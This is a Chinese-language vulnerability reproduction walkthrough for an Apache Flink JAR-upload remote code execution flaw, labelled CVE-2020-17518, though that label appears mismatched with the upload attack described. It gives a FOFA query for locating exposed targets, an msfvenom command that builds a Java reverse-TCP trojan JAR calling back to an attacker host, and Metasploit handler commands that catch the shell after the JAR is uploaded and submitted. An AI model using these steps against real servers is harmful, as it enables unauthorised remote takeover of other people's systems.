跳转至

Apache Flink upload 远程命令执行漏洞 CVE-2020-17518

漏洞描述

近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,攻击者通过漏洞可以获取系统权限

漏洞影响

Apache Flink <= 1.9.1

网络测绘

FOFA: app="Apache Flink"

环境搭建

06d235d4-965d-44e0-91c0-dc69b97bf48d

漏洞复现

点击查看文件上传页面

bb05ef9f-f86f-4bb5-bbcb-c13424d7aca4

打开MSF 生成一个 jar 木马

msfvenom -p java/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx  LPORT=4444 -f jar > test.jar

点击 Add 上传 jar 文件

1fcaa45f-0492-4411-b14f-e4554cf84e5b

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

3def5e8c-6590-4ecd-8b61-dfcb095bdaa0

点击下 submit

681f48a7-3501-4f52-8532-5efddcc0074f

16969b72-8db4-42f8-a0e3-b02022ab5f5b